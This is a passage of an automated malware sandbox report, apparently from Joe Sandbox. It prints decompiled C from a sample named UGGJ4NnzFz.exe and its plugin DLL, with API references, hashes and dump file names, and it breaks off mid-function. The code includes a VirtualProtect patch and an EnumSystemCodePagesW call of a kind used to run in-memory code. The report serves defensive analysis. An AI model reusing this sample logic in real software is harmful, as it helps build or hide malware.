                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064ce
                                                                                                                0x004064d1
                                                                                                                0x004064d4
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064da
                                                                                                                0x004064dc
                                                                                                                0x004064dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x00406722
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406728
                                                                                                                0x0040672b
                                                                                                                0x0040672e
                                                                                                                0x00406731
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406736
                                                                                                                0x00406739
                                                                                                                0x0040673c
                                                                                                                0x0040673f
                                                                                                                0x00406742
                                                                                                                0x00406745
                                                                                                                0x00406746
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x0040674b
                                                                                                                0x0040674e
                                                                                                                0x00406751
                                                                                                                0x00406754
                                                                                                                0x00406757
                                                                                                                0x0040675b
                                                                                                                0x0040675d
                                                                                                                0x00406760
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x004064df
                                                                                                                0x004064df
                                                                                                                0x00000000
                                                                                                                0x004064df
                                                                                                                0x00406760
                                                                                                                0x00406995
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4
                                                                                                                0x004069cc
                                                                                                                0x004069cc
                                                                                                                0x00000000
                                                                                                                0x004069cc
                                                                                                                0x00406819
                                                                                                                0x004067a0
                                                                                                                0x0040679d

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                                • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                                                • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                                • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                                                                                                                0x0040138a
                                                                                                                0x004013fa
                                                                                                                0x0040139b
                                                                                                                0x004013a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004013a2
                                                                                                                0x004013a3
                                                                                                                0x004013ad
                                                                                                                0x00000000
                                                                                                                0x00401404
                                                                                                                0x004013b0
                                                                                                                0x004013b7
                                                                                                                0x004013bd
                                                                                                                0x004013be
                                                                                                                0x004013c0
                                                                                                                0x004013c2
                                                                                                                0x004013b9
                                                                                                                0x004013b9
                                                                                                                0x004013ba
                                                                                                                0x004013ba
                                                                                                                0x004013c9
                                                                                                                0x004013cb
                                                                                                                0x004013f4
                                                                                                                0x004013f4
                                                                                                                0x004013c9
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                                • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                                                • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                                • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                0x00405841
                                                                                                                0x0040584e
                                                                                                                0x00405863
                                                                                                                0x00405869

                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\UGGJ4NnzFz.exe,80000000,00000003), ref: 00405841
                                                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 415043291-0
                                                                                                                • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                                • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                                                • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                                • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040581E(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                                                0x00405822
                                                                                                                0x0040582b
                                                                                                                0x00000000
                                                                                                                0x00405834
                                                                                                                0x0040583a

                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(?,00405629,?,?,?), ref: 00405822
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405834
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                • Instruction ID: 89544605ef234ac14ed66c3b065a2d642d1346908a696065e0ba681aeed38476
                                                                                                                • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                • Instruction Fuzzy Hash: F8C04CB1808501ABD7056B24EF0D81F7B66EF50325B108B35F5A9E00F0C7355C66DA1A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 73752A38, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E73752A38(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73754040 != 0 && E7375297D(_a4) == 0) {
					 *0x73754044 = _t93;
					if( *0x7375403c != 0) {
						_t93 =  *0x7375403c;
					} else {
						E73752F60(E73752977(), __ecx);
						 *0x7375403c = _t93;
					}
				}
				_t28 = E737529AB(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E7375299F();
					_t72 = _a4;
					_t79 =  *0x73754048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73754048 = _t72;
					E73752999();
					_t33 = EnumSystemCodePagesW(??, ??); // executed
					 *0x7375401c = _t33;
					 *0x73754020 = _t79;
					if( *0x73754040 != 0 && E7375297D( *0x73754048) == 0) {
						 *0x7375403c = _t94;
						_t94 =  *0x73754044;
					}
					_t80 =  *0x73754048;
					_a4 = _t80;
					 *0x73754048 =  *((intOrPtr*)(E7375299F() + _t80));
					_t37 = E7375298B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E737529AB(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E737529B6() + _a4 + _v8);
							_push(E737529C0());
							if( *0x73754040 <= 0 || E7375297D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7375403c =  *0x7375403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73754048;
					if( *0x73754048 == 0) {
						 *0x7375403c = 0;
					}
					E737529E4(_t107, _a4,  *0x7375401c,  *0x73754020);
					return _a4;
				}
				_push(E737529B6() + _a4);
				_t56 = E737529BC();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E737529C8();
				_t87 = E737529C4();
				_t90 = E737529C0();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                                                0x73752a48
                                                                                                                0x73752a59
                                                                                                                0x73752a66
                                                                                                                0x73752a7a
                                                                                                                0x73752a68
                                                                                                                0x73752a6d
                                                                                                                0x73752a72
                                                                                                                0x73752a72
                                                                                                                0x73752a66
                                                                                                                0x73752a83
                                                                                                                0x73752a88
                                                                                                                0x73752a8e
                                                                                                                0x73752ad2
                                                                                                                0x73752ad2
                                                                                                                0x73752ad7
                                                                                                                0x73752adc
                                                                                                                0x73752ae2
                                                                                                                0x73752ae4
                                                                                                                0x73752aea
                                                                                                                0x73752af7
                                                                                                                0x73752af9
                                                                                                                0x73752afe
                                                                                                                0x73752b0b
                                                                                                                0x73752b1e
                                                                                                                0x73752b24
                                                                                                                0x73752b2a
                                                                                                                0x73752b2b
                                                                                                                0x73752b31
                                                                                                                0x73752b3d
                                                                                                                0x73752b43
                                                                                                                0x73752b4b
                                                                                                                0x73752b4c
                                                                                                                0x73752b4f
                                                                                                                0x73752b5a
                                                                                                                0x73752b5c
                                                                                                                0x73752b68
                                                                                                                0x73752b6e
                                                                                                                0x73752b76
                                                                                                                0x73752ba2
                                                                                                                0x73752ba3
                                                                                                                0x73752ba5
                                                                                                                0x73752ba9
                                                                                                                0x73752ba9
                                                                                                                0x73752bb0
                                                                                                                0x73752b86
                                                                                                                0x73752b86
                                                                                                                0x73752b87
                                                                                                                0x73752b95
                                                                                                                0x73752b9e
                                                                                                                0x73752b9e
                                                                                                                0x73752b76
                                                                                                                0x73752b5a
                                                                                                                0x73752bb2
                                                                                                                0x73752bb9
                                                                                                                0x73752bbb
                                                                                                                0x73752bbb
                                                                                                                0x73752bd4
                                                                                                                0x73752be2
                                                                                                                0x73752be2
                                                                                                                0x73752a99
                                                                                                                0x73752a9a
                                                                                                                0x73752a9f
                                                                                                                0x73752aa3
                                                                                                                0x73752aa8
                                                                                                                0x73752abc
                                                                                                                0x73752abd
                                                                                                                0x73752abe
                                                                                                                0x73752ac0
                                                                                                                0x73752ac5
                                                                                                                0x73752ac7
                                                                                                                0x73752ac7
                                                                                                                0x73752aca
                                                                                                                0x73752ad0
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • EnumSystemCodePagesW.KERNELBASE(00000000), ref: 73752AF7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CodeEnumPagesSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2369445336-0
                                                                                                                • Opcode ID: b192221b16464ec97e72724cb7333f245d3a84974a12f4ca38da48c7cbca455c
                                                                                                                • Instruction ID: 61194e38dfb2c72b1cee9ef34a59c477d3725d906919faa0908f29d50873d815
                                                                                                                • Opcode Fuzzy Hash: b192221b16464ec97e72724cb7333f245d3a84974a12f4ca38da48c7cbca455c
                                                                                                                • Instruction Fuzzy Hash: 31416C7390431DDFEB2DAFA5DA86B593779EB44324F344469F809E7250DB3898808FA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                0x004031c3
                                                                                                                0x004031d6
                                                                                                                0x004031de
                                                                                                                0x00000000
                                                                                                                0x004031e5
                                                                                                                0x00000000
                                                                                                                0x004031e7

                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                • Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
                                                                                                                • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                • Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 73752921, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73754038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7375404c, 4, 0x40, 0x7375403c); // executed
					 *0x7375404c = 0xc2;
					 *0x7375403c = 0;
					 *0x73754044 = 0;
					 *0x73754058 = 0;
					 *0x73754048 = 0;
					 *0x73754040 = 0;
					 *0x73754050 = 0;
					 *0x7375404e = 0;
				}
				return 1;
			}



                                                                                                                0x7375292a
                                                                                                                0x7375292f
                                                                                                                0x7375293f
                                                                                                                0x73752947
                                                                                                                0x7375294e
                                                                                                                0x73752953
                                                                                                                0x73752958
                                                                                                                0x7375295d
                                                                                                                0x73752962
                                                                                                                0x73752967
                                                                                                                0x7375296c
                                                                                                                0x7375296c
                                                                                                                0x73752974

                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(7375404C,00000004,00000040,7375403C), ref: 7375293F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 295aa0026a27090dd78fea463dfe950be07a41527f62f3cfda86e51957c74f37
                                                                                                                • Instruction ID: fd05530ec4c7a6fae764fdd99100e89db17e7adc5f6b63cc835fdc56ffb2de37
                                                                                                                • Opcode Fuzzy Hash: 295aa0026a27090dd78fea463dfe950be07a41527f62f3cfda86e51957c74f37
                                                                                                                • Instruction Fuzzy Hash: 95F092B39083AEDEC368EF6A85467063EF0A319264F3145AAE59CD7241E33C40448B11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                0x004031ff
                                                                                                                0x00403205

                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                                • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 7375101B, Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E7375101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E737514BB();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E737514E2();
			}





                                                                                                                0x7375101b
                                                                                                                0x73751022
                                                                                                                0x7375102f
                                                                                                                0x73751035
                                                                                                                0x73751024
                                                                                                                0x73751024
                                                                                                                0x73751024
                                                                                                                0x7375103c

                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,73751019,00000001), ref: 7375102F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761449716-0
                                                                                                                • Opcode ID: e68cf1fb1969a679ddb17c923b7af56d9e2ce0cad13dcf07f19316e10b12f957
                                                                                                                • Instruction ID: 5251ed11ce95a2627608bd452ee54b52c73e606c7dc5c29c2567c65e39ac583f
                                                                                                                • Opcode Fuzzy Hash: e68cf1fb1969a679ddb17c923b7af56d9e2ce0cad13dcf07f19316e10b12f957
                                                                                                                • Instruction Fuzzy Hash: 76C08CA300030ABBFE1CA2F68B49F2A22AC8B48253F20D404F64EC70C0DA29C5009231
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 73751215, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E73751215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x7375405c); // executed
				return _t1;
			}




                                                                                                                0x7375121d
                                                                                                                0x73751223

                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNELBASE(00000040,73751233,?,737512CF,-7375404B,737511AB,-000000A0), ref: 7375121D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761449716-0
                                                                                                                • Opcode ID: 799230b3ed578165fb5abf324bf360401d1ae19f5b3704d99f6b98558823ff18
                                                                                                                • Instruction ID: 5bea91db95acab8fcf084d33bc01f0f412965d057ee176b6a63cf6b5074a7bce
                                                                                                                • Opcode Fuzzy Hash: 799230b3ed578165fb5abf324bf360401d1ae19f5b3704d99f6b98558823ff18
                                                                                                                • Instruction Fuzzy Hash: F0A0017394521ADAEE49ABE2890AF543A22A748721F308080E35D541A4C66A40109B25
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
